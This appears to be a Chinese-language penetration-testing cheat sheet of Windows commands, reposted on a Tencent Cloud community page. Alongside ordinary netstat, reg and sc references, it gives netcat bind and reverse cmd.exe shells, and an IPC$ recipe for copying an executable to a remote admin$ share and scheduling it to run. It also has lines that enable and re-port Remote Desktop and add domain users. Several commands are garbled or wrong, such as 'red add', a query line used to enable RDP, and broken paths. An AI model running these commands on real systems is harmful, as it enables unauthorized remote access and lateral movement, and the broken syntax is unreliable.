渗透基础——命令

NETSTAT

作用:显示协议统计信息和当前TCP/IP网络连接

netstat -a 显示所有连接和侦听端口

netstat -ano 显示所有连接和侦听端口,以数字形式显示进程ID

netstat -r 显示路由表(等价于 route print)

netstat -f 显示本机与外部连接(NT6.0以上)

netstat -b 拥有足够权限可以查看每个连接及侦听端口所涉及的可执行程序

netstat -p TCP 查看连接中使用的协议

NBTSTAT

作用:显示本地计算机和远程计算机的基于TCP/IP(NetBT)协议的NetBIOS统计资料、NetBIOS名称表和NetBIOS名称缓存

NBTSTAT 格式:nbtstat [-a remotename] [-A ip address] [-c] [-n] [-R] [-RR] [-s][-S]

[interval]

nbtstat -acleanxp 列出指定名称的远程机器的名称表

nbtstat -AIP 列出指定IP地址的远程机器的名称表

nbtstat -n 列出本地NetBIOS名称

nbtstat -R 清除NetBIOS名称缓存并重新装载到本地 Lmhosts(c:\windows\system32\drivers\etc\lmhosts.sam)

文件中 带标记#PRE的项目

REG(winxp提供的,可以添加、更改和显示注册表项中的注冊表子项信息和值)

REG QUERY 查询(显示注册表项setup下所有子项和值)

REG ADD 增加(添加注册表项、值)

REG DELETE 删除(删除注册表项及其所有子项和值)

REG COPY 拷贝(复制注册表项及其子项)

REG SAVE 保存(将注册表项保存到文件)

REG RESTORE 还原注册表

REG LOAD 加载注册表文件/项

REG UNLOAD 卸载配置单元的注册表项

REG COMPARE 注册表项比较

REG EXPORT 导出注册表

REG IMPORT 导入注册表

HKCR:HKEY_CLASSES_ROOT

基层类别键,用于定义系统中所有已经注册的文件扩展名、文件类型、文件图标等

HKCU:HKEY_CURRENT_USER

定义当前用户的所有权限

HKLM:HKEY_LOCAL_MACHINE

定义相对网络环境而言的本地计算机软硬件的全部信息

HKU:HKEY_USERS

定义所用的用户信息,其中部分分支将映射到HKEY_CUQQENT_USER关键字中,大部分设置都可以通过控制面板来修改

HKCC:HKEY_CURRENT_CONFIG

定义计算机的当前配置情况,实际上就是指向HKEY_LOCAL_MASHINE\Config 结构中的某个分支的指针

REGADD(将新的子项或项添加到注册表中)

语法:red addkeyName [/v EntryName|/ve] [/t Data Type]

[/s separator] [/d value][/f]

参数:keyName

指定子项的完全路径。有效子目录树为HKLM、HKCU、HKCR、HKU以及HKCC。远程机器上只有HKLM和HKU

/V EntryName 指定要添加到指定子项下的项名称

/ve 指定添加到注册表中的项为空值

/t DataType 指定项值的数据类型

DataType可以是以下几种类型:

REG-SZ

REG-MULTI-SZ

REG-DWORD-BIG-ENDIAN

REG-DWORD

REG-BINARY

REG-DWORD-LITTLE-ENDIAN

REG-LINK

REG-FULL-RESOURCE-DESCRIPTOR

REG-EXPAND-SZ

/s separator 指定用于分隔多个数据实例的字符

/d value 指定新注册表项的值

/f 不用询问信息而直接添加子项或项

/? 显示帮助

REG QUERY(返回注册表的子项下的项和下一层子项的列表)

语法:reg query keyName [{/v EntryName | /ve}][/s]

/v EntryName 返回特定的项及其值

/ve 指定仅返回为空值的项

/s 将返回各个层中的所有子项和项

查看注册表远程桌面的端口号

REG queryHKLM\SYSTEM\CurrentControlset\Control\Terminal” ”Server\WinStations\RDP-TCP /v PortNumber

开启3389

REG queryHKLM\SYSTEM\CurrentControlset\Control\Terminal” ”Server /v fDenyTSconnections /t REG-DWORD /d 00000000 /f

修改端口为2008(0x7d8)

REG ADD HKLM\SYSTEM\CurrentControlset\Control\Terminal” ”Server\wds\rdpwd\Tds\tcp /vPortNumber /t REG-DWORD /d 0X7d8 /f

REG ADD HKLM\SYSTEM\CurrentControlset\Control\Terminal””Server\WinStations\RDP-TCP /vPortNumber /t REG-DWORD /d 0x7d8 /f

SC(用来与服务控制管理器和服务进行通信)

sc query/queryex 查询服务的状态/查询服务的扩展状态

scconfig 更改服务的配置

sc stop 向服务发送stop请求

sc delete (从注册表中)删除服务

sc start 启动服务

sc pause 向服务发送PAUSE控制请求

sc continue 向服务发送CONTINUE控制请求

type:显示文本文件内容

rar

-a 添加文件到压缩文件

-e 解压压缩文件到当前目录

-p[密码] 设置密码

压缩: ① 【未加密】rar a F:\test\1.rar F:\temp

② 【加密】 rar a -p password F:\test\1.rar F:\temp

解压: ① rar e F:\test\1.rar E:\test

② rar e -ppassword F:\test\1.rar E:\test

nc

网络安全界的“瑞士军刀”,一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据

-l 监听模式,用于入站连接

-w secs timeout的时间

-L 连接关闭后,仍然继续监听

-n 指定数字的IP地址,不能用hostname

-p port 本地端口号

-v 详细输出,用两个-v可得到更详细的内容

-z 将输入输出关掉,用于扫描时

①连接到远程主机:

格式:nc -nvv 192.168.x.x 80

讲解:连接 192.168.x.x的TCP 80端口

②监听本地主机

格式:nc -l -vv -p 80

讲解:监听本机的TCP 80端口

③扫描远程主机

格式:nc -nvv -w2 -z 192.168.x.x 80 -445

讲解:扫描192.168.x.x的TCP 80到TCP 445的所有端口

④远程主机绑定shell

格式:nc -l -p 5354 -t -e c:winntsystem32 cmd.exe

讲解:绑定远程主机的cmdshell 在远程主机的TCP 5354端口

⑤远程主机绑定shell并反向连接

格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354

讲解:绑定远程主机的cmdshell 并反向连接到192.168.x.x的TCP 5354端口

域命令

1、域内添加用户

net user username pass /add/domain

2、域内禁用用户

net userusername /active:no/domain

3、域内激活用户

net user username /active:yes/domain

4、域内删除用户

net user username /del/domain

5、列出域内所有的机器名

desquery computer domainroot -limit 0

net group “domain computers” /domain

6、列出域内所有的用户

dsquery user domainroot -limit 0

net user /domain

7、列出域内的内网划分

dsquery subnet

8、列出域内的所有分组

dsquery group

net group /domain

9、列出域控制器(域控,DC)

dsquery server

net group “domain controllers” /domain

10、列出域管理员用户

net group “domain admins” /domain

11、列出域列表

net view /domain

12、查看当前域活动机器列表

net view /domain:DC name

IPC$(依赖139 445端口)

场景:远程机器192.168.123.123,用户名为:administrator,密码为:abc@123

(1)建立ipc$连接

net use \\192.168.123.123\ipc$ "abc@123" /user:administrator

(一定要注意:这一行命令中包含了3个空格)

(2)列远程机器admin$目录

dir \\192.168.123.123\admin$

(3)把本地的c:\ntlm.exe文件拷贝到远程的主机上

copyc:\ntlm.exe \\192.168.123.123\admin$

(4)查看远程机器时间

nettime \\192.168.123.123

(5)在下一个时间点运行上传的文件ntlm.exe(当前时间为:14:57)

at\\192.168.123.123 15:00 ntlm.exe

(6)删除远程机器上ntlm.exe文件

del \\192.168.123.123\admin$\ntlm.exe /f/q

(7)把对方的磁盘C映射为本地的Z盘

netuse z: \\192.168.123.123\c$

(8)删除磁盘映射连接

netuse z: /del

(9)删除IPC$连接

netuse \\192.168.123.123\ipc$ /del

netuse * /del

IPC$ 依赖哪些服务

开启IPC$共享

启动lanmanworkstations服务(显示名:workstations)

启动lanmanserver服务(显示名:server)

启动netlogon

打开139、445端口

Ipc$常见的错误代码及原因

错误号5,拒绝访问:很可能你使用的用户不是管理员权限的;

错误号51,Windows无法找到网络路径:网络有问题;

错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;

错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;

错误号1326,未知的用户名或错误密码:原因很明显了;

错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;

错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。

  • 发表于:
  • 原文链接:https://kuaibao.qq.com/s/20180519G0ZXCZ00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。

扫码关注云+社区

领取腾讯云代金券